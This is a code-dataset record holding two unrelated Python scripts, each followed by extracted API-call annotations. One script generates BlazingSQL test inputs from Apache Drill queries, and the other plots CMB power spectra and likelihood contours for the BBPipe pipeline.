"table_name": table_name,
"file_path": file_path,
"column_names": get_column_names(table),
"column_types": get_column_types(table),
}
)
drill_query = get_drill_query(query)
print("\t#drill_query: ", drill_query)
return (
(
"""
{
"testName": "%(test_name)s",
"query": "%(query)s",
"tables": [%(table_inputs)s],
"result": %(result)s,
"resultTypes": %(result_types)s,
"resultColumnNames": %(result_names)s
}
"""
)
% {
"test_name": test_name,
"query": get_blazingsql_query(db_name, query),
"table_inputs": ",".join(table_inputs),
"result": get_reference_result(drill, table, drill_query),
"result_types": get_reference_result_types(drill,
table, drill_query),
"result_names": get_reference_result_names(drill,
table, drill_query),
}
)
def get_reference_result_names(drill, table, query_str):
query_result = drill.query(query_str)
return "[%s]" % (",".join(['"%s"' % name for name in
query_result.columns]))
def get_reference_result(drill, table, query_str):
query_result = drill.query(query_str)
df = query_result.to_dataframe()
items = []
for column in query_result.columns:
s = "[%s]" % (
",".join(
[
"-1"
if item is None
else "1"
if item is True
else "0"
if item is False
else item
for item in np.asarray(df[column])
]
)
)
items.append(s)
return "[%s]" % (",".join(items))
def get_reference_result_types(drill, table, query_str):
query_result = drill.query(query_str)
df = query_result.to_dataframe()
for col in query_result.columns:
df[col] = pd.to_numeric(df[col], errors="coerce")
def get_dtype(dtype):
if pd.api.types.is_categorical_dtype(dtype):
return "GDF_INT8"
dicc = {
np.float64: "GDF_FLOAT64",
np.float32: "GDF_FLOAT32",
np.int64: "GDF_INT64",
np.int32: "GDF_INT32",
np.int16: "GDF_INT16",
np.int8: "GDF_INT8",
np.bool_: "GDF_INT8",
np.datetime64: "GDF_DATE64",
np.object: "GDF_INT64",
}
_type = np.dtype(dtype).type
if _type in dicc:
return dicc[_type]
return "GDF_INT64"
return "[%s]" % (
",".join(
['"%s"' % get_dtype(df[column].dtype) for column
in query_result.columns])
)
def get_gdf_type(table, column_name):
types = {
"double": "GDF_FLOAT64",
"float": "GDF_FLOAT32",
"long": "GDF_INT64",
"int": "GDF_INT32",
"short": "GDF_INT32",
"char": "GDF_INT8",
"date": "GDF_DATE64",
}
t = table.get(column_name)
if t in types:
return types[t]
return "GDF_UNDEFINED"
def get_column_names(table):
return "[%s]" % (
",".join(
['"%s"' % _name for _name, _type in table.items()]))
def get_column_types(table):
return "[%s]" % (
",".join(
['"%s"' % gdf_type(native_type(_type)) for _name, _type
in table.items()]
)
)
def native_type(type_name): # to conver string(xyz) to string
if type_name.find("string") != -1:
return "string"
else:
return type_name
def gdf_type(type_name):
return {
"double": "GDF_FLOAT64",
"float": "GDF_FLOAT32",
"long": "GDF_INT64",
"int": "GDF_INT32",
"short": "GDF_INT32",
"char": "GDF_INT8",
"date": "GDF_INT64",
"string": "GDF_STRING",
}[type_name]
def get_selected_columns(table):
# [ y for y in a if y not in b]
return [
_name for _name,
_type in table.items() if _type.find('string') == -
1]
def write(json_list):
def to(filename):
with sys.stdout if '-' == filename else open(filename, 'w') as output:
output.write('[%s]' % (','.join([item for item in json_list])))
return type('writer', (), dict(to=to))
def generate_json_input(drill, tpch_path, your_queries, output):
print("# OUTPUT \t", output)
json_list = []
for index, query in enumerate(your_queries):
print("## processing...\t", query)
json_text = get_reference_input(drill, tpch_path,
"TEST_0%s" % index, query)
json_list.append(json_text)
write(json_list).to(output)
if __name__ == "__main__":
drill = PyDrill(host="localhost", port=8047)
if not drill.is_active():
raise Exception("Please run Drill first")
parser = argparse.ArgumentParser(
description="Generate Input Generator for UnitTestGenerator."
)
parser.add_argument(
"tpch_path", type=str, help="use complete path, ex /tmp/tpch/1mb/"
)
parser.add_argument(
"-O", "--output", type=str, default="-",
help="Output file path or - for stdout"
)
args = parser.parse_args()
tpch_path = args.tpch_path
tpch.init_schema(drill, tpch_path)
your_queries = ["""select c_custkey, c_nationkey, c_acctbal
from customer where c_custkey < 15""", ]
generate_json_input(drill, tpch_path, your_queries, args.output)
|
[
"argparse.ArgumentParser",
"tpch.init_schema",
"numpy.asarray",
"numpy.dtype",
"pydrill.client.PyDrill",
"pandas.api.types.is_categorical_dtype",
"re.sub",
"pandas.to_numeric"
] |
[((6477, 6513), 'pydrill.client.PyDrill', 'PyDrill', ([], {'host': '"""localhost"""', 'port': '(8047)'}), "(host='localhost', port=8047)\n", (6484, 6513), False, 'from pydrill.client import PyDrill\n'), ((6608, 6699), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate Input Generator for UnitTestGenerator."""'}), "(description=\n 'Generate Input Generator for UnitTestGenerator.')\n", (6631, 6699), False, 'import argparse\n'), ((7010, 7044), 'tpch.init_schema', 'tpch.init_schema', (['drill', 'tpch_path'], {}), '(drill, tpch_path)\n', (7026, 7044), False, 'import tpch\n'), ((340, 375), 're.sub', 're.sub', (["('\\\\s%s(\\\\s|$)' % i)", 'j', 'text'], {}), "('\\\\s%s(\\\\s|$)' % i, j, text)\n", (346, 375), False, 'import re\n'), ((3680, 3719), 'pandas.to_numeric', 'pd.to_numeric', (['df[col]'], {'errors': '"""coerce"""'}), "(df[col], errors='coerce')\n", (3693, 3719), True, 'import pandas as pd\n'), ((3758, 3798), 'pandas.api.types.is_categorical_dtype', 'pd.api.types.is_categorical_dtype', (['dtype'], {}), '(dtype)\n', (3791, 3798), True, 'import pandas as pd\n'), ((4200, 4215), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (4208, 4215), True, 'import numpy as np\n'), ((3358, 3380), 'numpy.asarray', 'np.asarray', (['df[column]'], {}), '(df[column])\n', (3368, 3380), True, 'import numpy as np\n')]
|
from bbpipe import PipelineStage
from .types import FitsFile, DirFile, HTMLFile, NpzFile
import sacc
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import dominate as dom
import dominate.tags as dtg
import os
class BBPlotter(PipelineStage):
name="BBPlotter"
inputs=[('cells_coadded_total', FitsFile), ('cells_coadded', FitsFile),
('cells_noise', FitsFile), ('cells_null', FitsFile),
('cells_fiducial', FitsFile), ('param_chains',NpzFile)]
outputs=[('plots',DirFile), ('plots_page',HTMLFile)]
config_options={'lmax_plot':300, 'plot_coadded_total': True,
'plot_noise': True, 'plot_nulls': True,
'plot_likelihood': True}
def create_page(self):
# Open plots directory
if not os.path.isdir(self.get_output('plots')):
os.mkdir(self.get_output('plots'))
# Create HTML page
self.doc = dom.document(title='BBPipe plots page')
with self.doc.head:
dtg.link(rel='stylesheet', href='style.css')
dtg.script(type='text/javascript', src='script.js')
with self.doc:
dtg.h1("Pipeline outputs")
dtg.h2("Contents:",id='contents')
lst=dtg.ul()
lst+=dtg.li(dtg.a('Bandpasses',href='#bandpasses'))
lst+=dtg.li(dtg.a('Coadded power spectra',href='#coadded'))
if self.config['plot_nulls']:
lst+=dtg.li(dtg.a('Null tests',href='#nulls'))
if self.config['plot_likelihood']:
lst+=dtg.li(dtg.a('Likelihood',href='#like'))
def add_bandpasses(self):
with self.doc:
dtg.h2("Bandpasses",id='bandpasses')
lst=dtg.ul()
# Overall plot
title='Bandpasses summary'
fname=self.get_output('plots')+'/bpass_summary.png'
plt.figure()
plt.title(title,fontsize=14)
for n, t in self.s_fid.tracers.items():
nu_mean=np.sum(t.bandpass*t.nu**3)/np.sum(t.bandpass*t.nu**2)
plt.plot(t.nu,t.bandpass/np.amax(t.bandpass),label=n+', $\\langle\\nu\\rangle=%.1lf\\,{\\rm GHz}$'%nu_mean)
plt.xlabel('$\\nu\\,[{\\rm GHz}]$',fontsize=14)
plt.ylabel('Transmission',fontsize=14)
plt.ylim([0.,1.3])
plt.legend(frameon=0,ncol=2,labelspacing=0.1,loc='upper left')
plt.xscale('log')
plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
for n, t in self.s_fid.tracers.items():
title='Bandpass '+n
fname=self.get_output('plots')+'/bpass_'+n+'.png'
plt.figure()
plt.title(title,fontsize=14)
plt.plot(t.nu,t.bandpass/np.amax(t.bandpass))
plt.xlabel('$\\nu\\,[{\\rm GHz}]$',fontsize=14)
plt.ylabel('Transmission',fontsize=14)
plt.ylim([0.,1.05])
plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def add_coadded(self):
with self.doc:
dtg.h2("Coadded power spectra",id='coadded')
lst=dtg.ul()
pols = ['e', 'b']
print(self.s_fid.tracers)
for t1, t2 in self.s_cd_x.get_tracer_combinations():
for p1 in range(2):
if t1==t2:
p2range = range(p1, 2)
else:
p2range = range(2)
for p2 in p2range:
x = pols[p1] + pols[p2]
typ = 'cl_' + x
# Plot title
title = f"{t1} x {t2}, {typ}"
# Plot file
fname =self.get_output('plots')+'/cls_'
fname+= f"{t1}_x_{t2}_{typ}.png"
print(fname)
plt.figure()
plt.title(title, fontsize=14)
l, cl = self.s_fid.get_ell_cl(typ, t1, t2)
plt.plot(l[l<self.lmx], cl[l<self.lmx], 'k-', label='Fiducial model')
if self.config['plot_coadded_total']:
l, cl, cov = self.s_cd_t.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cov)))[msk]
plt.errorbar(l[msk], cl[msk], yerr=el, fmt='ro',
label='Total coadd')
eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='ro', mfc='white')
eb[-1][0].set_linestyle('--')
if self.config['plot_noise']:
l, cl, cov = self.s_cd_n.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cov)))[msk]
plt.errorbar(l[msk], cl[msk], yerr=el, fmt='yo',
label='Noise')
eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='yo', mfc='white')
eb[-1][0].set_linestyle('--')
l, cl, cov = self.s_cd_x.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cov)))[msk]
plt.errorbar(l[msk], cl[msk], yerr=el, fmt='bo',
label='Cross-coadd')
eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='bo', mfc='white')
eb[-1][0].set_linestyle('--')
plt.yscale('log')
plt.xlabel('$\\ell$',fontsize=15)
if self.config['compute_dell']:
plt.ylabel('$D_\\ell$',fontsize=15)
else:
plt.ylabel('$C_\\ell$',fontsize=15)
plt.legend()
plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def add_nulls(self):
with self.doc:
dtg.h2("Null tests",id='nulls')
lst=dtg.ul()
pols = ['e', 'b']
for t1, t2 in self.s_null.get_tracer_combinations():
title = f"{t1} x {t2}"
fname =self.get_output('plots')+'/cls_null_'
fname+= f"{t1}_x_{t2}.png"
print(fname)
plt.figure()
plt.title(title,fontsize=15)
for p1 in range(2):
for p2 in range(2):
x = pols[p1] + pols[p2]
typ='cl_'+x
l, cl, cv = self.s_null.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cv)))[msk]
plt.errorbar(l[msk], cl[msk]/el,
yerr=np.ones_like(el),
fmt=self.cols_typ[x]+'-', label=x)
plt.xlabel('$\\ell$',fontsize=15)
plt.ylabel('$C_\\ell/\\sigma_\\ell$',fontsize=15)
plt.legend()
plt.savefig(fname,bbox_index='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def add_contours(self):
from getdist import MCSamples
from getdist import plots as gplots
with self.doc:
dtg.h2("Likelihood",id='like')
lst=dtg.ul()
# Labels and true values
labdir={'A_lens':'A_{\\rm lens}',
'r_tensor':'r',
'beta_d':'\\beta_d',
'epsilon_ds':'\\epsilon_{ds}',
'alpha_d_bb':'\\alpha_d',
'amp_d_bb':'A_d',
'beta_s':'\\beta_s',
'alpha_s_bb':'\\alpha_s',
'amp_s_bb':'A_s'}
# TODO: we need to build this from the priors, I think.
truth={'A_lens':1.,
'r_tensor':0.,
'beta_d':1.59,
'epsilon_ds':0.,
'alpha_d_bb':-0.2,
'amp_d_bb':5.,
'beta_s':-3.,
'alpha_s_bb':-0.4,
'amp_s_bb':2.}
# Select only parameters for which we have labels
names_common=list(set(list(self.chain['names'])) & truth.keys())
msk_common=np.array([n in names_common for n in self.chain['names']])
npar=len(names_common)
nwalk,nsamp,npar_chain=self.chain['chain'].shape
chain=self.chain['chain'][:,nsamp//4:,:].reshape([-1,npar_chain])[:,msk_common]
names_common=np.array(self.chain['names'])[msk_common]
# Getdist
samples=MCSamples(samples=chain,
names=names_common,
labels=[labdir[n] for n in names_common])
g = gplots.getSubplotPlotter()
g.triangle_plot([samples], filled=True)
for i,n in enumerate(names_common):
v=truth[n]
g.subplots[i,i].plot([v,v],[0,1],'r-')
for j in range(i+1,npar):
u=truth[names_common[j]]
g.subplots[j,i].plot([v],[u],'ro')
# Save
fname=self.get_output('plots')+'/triangle.png'
g.export(fname)
lst+=dtg.li(dtg.a("Likelihood contours",href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def write_page(self):
with open(self.get_output('plots_page'),'w') as f:
f.write(self.doc.render())
def read_inputs(self):
print("Reading inputs")
# Power spectra
self.s_fid=sacc.Sacc.load_fits(self.get_input('cells_fiducial'))
self.s_cd_x=sacc.Sacc.load_fits(self.get_input('cells_coadded'))
if self.config['plot_coadded_total']:
self.s_cd_t=sacc.Sacc.load_fits(self.get_input('cells_coadded_total'))
if self.config['plot_noise']:
self.s_cd_n=sacc.Sacc.load_fits(self.get_input('cells_noise'))
if self.config['plot_nulls']:
self.s_null=sacc.Sacc.load_fits(self.get_input('cells_null'))
# Chains
if self.config['plot_likelihood']:
self.chain=np.load(self.get_input('param_chains'))
self.cols_typ={'ee':'r','eb':'g','be':'y','bb':'b'}
self.lmx = self.config['lmax_plot']
def run(self):
self.read_inputs()
self.create_page()
self.add_bandpasses()
self.add_coadded()
if self.config['plot_nulls']:
self.add_nulls()
if self.config['plot_likelihood']:
self.add_contours()
self.write_page()
if __name__ == '__main_':
cls = PipelineStage.main()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.yscale",
"numpy.sum",
"bbpipe.PipelineStage.main",
"matplotlib.pyplot.figure",
"getdist.MCSamples",
"numpy.diag",
"matplotlib.pyplot.close",
"dominate.tags.link",
"matplotlib.pyplot.errorbar",
"dominate.tags.h1",
"numpy.ones_like",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.legend",
"dominate.tags.a",
"getdist.plots.getSubplotPlotter",
"matplotlib.use",
"dominate.tags.h2",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xscale",
"matplotlib.pyplot.plot",
"dominate.document",
"numpy.amax",
"dominate.tags.script",
"numpy.array",
"matplotlib.pyplot.xlabel",
"dominate.tags.ul",
"matplotlib.pyplot.savefig"
] |
[((138, 159), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (152, 159), False, 'import matplotlib\n'), ((11386, 11406), 'bbpipe.PipelineStage.main', 'PipelineStage.main', ([], {}), '()\n', (11404, 11406), False, 'from bbpipe import PipelineStage\n'), ((952, 991), 'dominate.document', 'dom.document', ([], {'title': '"""BBPipe plots page"""'}), "(title='BBPipe plots page')\n", (964, 991), True, 'import dominate as dom\n'), ((1032, 1076), 'dominate.tags.link', 'dtg.link', ([], {'rel': '"""stylesheet"""', 'href': '"""style.css"""'}), "(rel='stylesheet', href='style.css')\n", (1040, 1076), True, 'import dominate.tags as dtg\n'), ((1089, 1140), 'dominate.tags.script', 'dtg.script', ([], {'type': '"""text/javascript"""', 'src': '"""script.js"""'}), "(type='text/javascript', src='script.js')\n", (1099, 1140), True, 'import dominate.tags as dtg\n'), ((1176, 1202), 'dominate.tags.h1', 'dtg.h1', (['"""Pipeline outputs"""'], {}), "('Pipeline outputs')\n", (1182, 1202), True, 'import dominate.tags as dtg\n'), ((1215, 1249), 'dominate.tags.h2', 'dtg.h2', (['"""Contents:"""'], {'id': '"""contents"""'}), "('Contents:', id='contents')\n", (1221, 1249), True, 'import dominate.tags as dtg\n'), ((1265, 1273), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (1271, 1273), True, 'import dominate.tags as dtg\n'), ((1690, 1727), 'dominate.tags.h2', 'dtg.h2', (['"""Bandpasses"""'], {'id': '"""bandpasses"""'}), "('Bandpasses', id='bandpasses')\n", (1696, 1727), True, 'import dominate.tags as dtg\n'), ((1743, 1751), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (1749, 1751), True, 'import dominate.tags as dtg\n'), ((1894, 1906), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1904, 1906), True, 'import matplotlib.pyplot as plt\n'), ((1919, 1948), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (1928, 1948), True, 'import matplotlib.pyplot as plt\n'), ((2214, 2262), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\nu\\\\,[{\\\\rm GHz}]$"""'], {'fontsize': '(14)'}), "('$\\\\nu\\\\,[{\\\\rm GHz}]$', fontsize=14)\n", (2224, 2262), True, 'import matplotlib.pyplot as plt\n'), ((2274, 2313), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Transmission"""'], {'fontsize': '(14)'}), "('Transmission', fontsize=14)\n", (2284, 2313), True, 'import matplotlib.pyplot as plt\n'), ((2325, 2345), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.3]'], {}), '([0.0, 1.3])\n', (2333, 2345), True, 'import matplotlib.pyplot as plt\n'), ((2356, 2421), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'frameon': '(0)', 'ncol': '(2)', 'labelspacing': '(0.1)', 'loc': '"""upper left"""'}), "(frameon=0, ncol=2, labelspacing=0.1, loc='upper left')\n", (2366, 2421), True, 'import matplotlib.pyplot as plt\n'), ((2431, 2448), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (2441, 2448), True, 'import matplotlib.pyplot as plt\n'), ((2461, 2500), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (2472, 2500), True, 'import matplotlib.pyplot as plt\n'), ((2512, 2523), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2521, 2523), True, 'import matplotlib.pyplot as plt\n'), ((3277, 3322), 'dominate.tags.h2', 'dtg.h2', (['"""Coadded power spectra"""'], {'id': '"""coadded"""'}), "('Coadded power spectra', id='coadded')\n", (3283, 3322), True, 'import dominate.tags as dtg\n'), ((3338, 3346), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (3344, 3346), True, 'import dominate.tags as dtg\n'), ((6560, 6592), 'dominate.tags.h2', 'dtg.h2', (['"""Null tests"""'], {'id': '"""nulls"""'}), "('Null tests', id='nulls')\n", (6566, 6592), True, 'import dominate.tags as dtg\n'), ((6608, 6616), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (6614, 6616), True, 'import dominate.tags as dtg\n'), ((7989, 8020), 'dominate.tags.h2', 'dtg.h2', (['"""Likelihood"""'], {'id': '"""like"""'}), "('Likelihood', id='like')\n", (7995, 8020), True, 'import dominate.tags as dtg\n'), ((8036, 8044), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (8042, 8044), True, 'import dominate.tags as dtg\n'), ((9010, 9070), 'numpy.array', 'np.array', (["[(n in names_common) for n in self.chain['names']]"], {}), "([(n in names_common) for n in self.chain['names']])\n", (9018, 9070), True, 'import numpy as np\n'), ((9367, 9457), 'getdist.MCSamples', 'MCSamples', ([], {'samples': 'chain', 'names': 'names_common', 'labels': '[labdir[n] for n in names_common]'}), '(samples=chain, names=names_common, labels=[labdir[n] for n in\n names_common])\n', (9376, 9457), False, 'from getdist import MCSamples\n'), ((9530, 9556), 'getdist.plots.getSubplotPlotter', 'gplots.getSubplotPlotter', ([], {}), '()\n', (9554, 9556), True, 'from getdist import plots as gplots\n'), ((1298, 1337), 'dominate.tags.a', 'dtg.a', (['"""Bandpasses"""'], {'href': '"""#bandpasses"""'}), "('Bandpasses', href='#bandpasses')\n", (1303, 1337), True, 'import dominate.tags as dtg\n'), ((1362, 1409), 'dominate.tags.a', 'dtg.a', (['"""Coadded power spectra"""'], {'href': '"""#coadded"""'}), "('Coadded power spectra', href='#coadded')\n", (1367, 1409), True, 'import dominate.tags as dtg\n'), ((2548, 2572), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (2553, 2572), True, 'import dominate.tags as dtg\n'), ((2744, 2756), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2754, 2756), True, 'import matplotlib.pyplot as plt\n'), ((2773, 2802), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (2782, 2802), True, 'import matplotlib.pyplot as plt\n'), ((2880, 2928), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\nu\\\\,[{\\\\rm GHz}]$"""'], {'fontsize': '(14)'}), "('$\\\\nu\\\\,[{\\\\rm GHz}]$', fontsize=14)\n", (2890, 2928), True, 'import matplotlib.pyplot as plt\n'), ((2944, 2983), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Transmission"""'], {'fontsize': '(14)'}), "('Transmission', fontsize=14)\n", (2954, 2983), True, 'import matplotlib.pyplot as plt\n'), ((2999, 3020), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.05]'], {}), '([0.0, 1.05])\n', (3007, 3020), True, 'import matplotlib.pyplot as plt\n'), ((3035, 3074), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (3046, 3074), True, 'import matplotlib.pyplot as plt\n'), ((3090, 3101), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3099, 3101), True, 'import matplotlib.pyplot as plt\n'), ((3175, 3213), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (3180, 3213), True, 'import dominate.tags as dtg\n'), ((6444, 6482), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (6449, 6482), True, 'import dominate.tags as dtg\n'), ((6901, 6913), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6911, 6913), True, 'import matplotlib.pyplot as plt\n'), ((6930, 6959), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(15)'}), '(title, fontsize=15)\n', (6939, 6959), True, 'import matplotlib.pyplot as plt\n'), ((7518, 7552), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\ell$"""'], {'fontsize': '(15)'}), "('$\\\\ell$', fontsize=15)\n", (7528, 7552), True, 'import matplotlib.pyplot as plt\n'), ((7568, 7618), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$C_\\\\ell/\\\\sigma_\\\\ell$"""'], {'fontsize': '(15)'}), "('$C_\\\\ell/\\\\sigma_\\\\ell$', fontsize=15)\n", (7578, 7618), True, 'import matplotlib.pyplot as plt\n'), ((7634, 7646), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (7644, 7646), True, 'import matplotlib.pyplot as plt\n'), ((7663, 7701), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_index': '"""tight"""'}), "(fname, bbox_index='tight')\n", (7674, 7701), True, 'import matplotlib.pyplot as plt\n'), ((7717, 7728), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7726, 7728), True, 'import matplotlib.pyplot as plt\n'), ((7803, 7841), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (7808, 7841), True, 'import dominate.tags as dtg\n'), ((9282, 9311), 'numpy.array', 'np.array', (["self.chain['names']"], {}), "(self.chain['names'])\n", (9290, 9311), True, 'import numpy as np\n'), ((10012, 10052), 'dominate.tags.a', 'dtg.a', (['"""Likelihood contours"""'], {'href': 'fname'}), "('Likelihood contours', href=fname)\n", (10017, 10052), True, 'import dominate.tags as dtg\n'), ((10074, 10112), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (10079, 10112), True, 'import dominate.tags as dtg\n'), ((1480, 1514), 'dominate.tags.a', 'dtg.a', (['"""Null tests"""'], {'href': '"""#nulls"""'}), "('Null tests', href='#nulls')\n", (1485, 1514), True, 'import dominate.tags as dtg\n'), ((1590, 1623), 'dominate.tags.a', 'dtg.a', (['"""Likelihood"""'], {'href': '"""#like"""'}), "('Likelihood', href='#like')\n", (1595, 1623), True, 'import dominate.tags as dtg\n'), ((2024, 2054), 'numpy.sum', 'np.sum', (['(t.bandpass * t.nu ** 3)'], {}), '(t.bandpass * t.nu ** 3)\n', (2030, 2054), True, 'import numpy as np\n'), ((2051, 2081), 'numpy.sum', 'np.sum', (['(t.bandpass * t.nu ** 2)'], {}), '(t.bandpass * t.nu ** 2)\n', (2057, 2081), True, 'import numpy as np\n'), ((3130, 3154), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (3135, 3154), True, 'import dominate.tags as dtg\n'), ((7757, 7781), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (7762, 7781), True, 'import dominate.tags as dtg\n'), ((2119, 2138), 'numpy.amax', 'np.amax', (['t.bandpass'], {}), '(t.bandpass)\n', (2126, 2138), True, 'import numpy as np\n'), ((2843, 2862), 'numpy.amax', 'np.amax', (['t.bandpass'], {}), '(t.bandpass)\n', (2850, 2862), True, 'import numpy as np\n'), ((4099, 4111), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4109, 4111), True, 'import matplotlib.pyplot as plt\n'), ((4136, 4165), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (4145, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4257, 4330), 'matplotlib.pyplot.plot', 'plt.plot', (['l[l < self.lmx]', 'cl[l < self.lmx]', '"""k-"""'], {'label': '"""Fiducial model"""'}), "(l[l < self.lmx], cl[l < self.lmx], 'k-', label='Fiducial model')\n", (4265, 4330), True, 'import matplotlib.pyplot as plt\n'), ((5659, 5728), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""bo"""', 'label': '"""Cross-coadd"""'}), "(l[msk], cl[msk], yerr=el, fmt='bo', label='Cross-coadd')\n", (5671, 5728), True, 'import matplotlib.pyplot as plt\n'), ((5793, 5859), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""bo"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='bo', mfc='white')\n", (5805, 5859), True, 'import matplotlib.pyplot as plt\n'), ((5936, 5953), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (5946, 5953), True, 'import matplotlib.pyplot as plt\n'), ((5978, 6012), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\ell$"""'], {'fontsize': '(15)'}), "('$\\\\ell$', fontsize=15)\n", (5988, 6012), True, 'import matplotlib.pyplot as plt\n'), ((6250, 6262), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6260, 6262), True, 'import matplotlib.pyplot as plt\n'), ((6287, 6326), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (6298, 6326), True, 'import matplotlib.pyplot as plt\n'), ((6350, 6361), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6359, 6361), True, 'import matplotlib.pyplot as plt\n'), ((4625, 4694), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""ro"""', 'label': '"""Total coadd"""'}), "(l[msk], cl[msk], yerr=el, fmt='ro', label='Total coadd')\n", (4637, 4694), True, 'import matplotlib.pyplot as plt\n'), ((4767, 4833), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""ro"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='ro', mfc='white')\n", (4779, 4833), True, 'import matplotlib.pyplot as plt\n'), ((5180, 5243), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""yo"""', 'label': '"""Noise"""'}), "(l[msk], cl[msk], yerr=el, fmt='yo', label='Noise')\n", (5192, 5243), True, 'import matplotlib.pyplot as plt\n'), ((5316, 5382), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""yo"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='yo', mfc='white')\n", (5328, 5382), True, 'import matplotlib.pyplot as plt\n'), ((6096, 6132), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$D_\\\\ell$"""'], {'fontsize': '(15)'}), "('$D_\\\\ell$', fontsize=15)\n", (6106, 6132), True, 'import 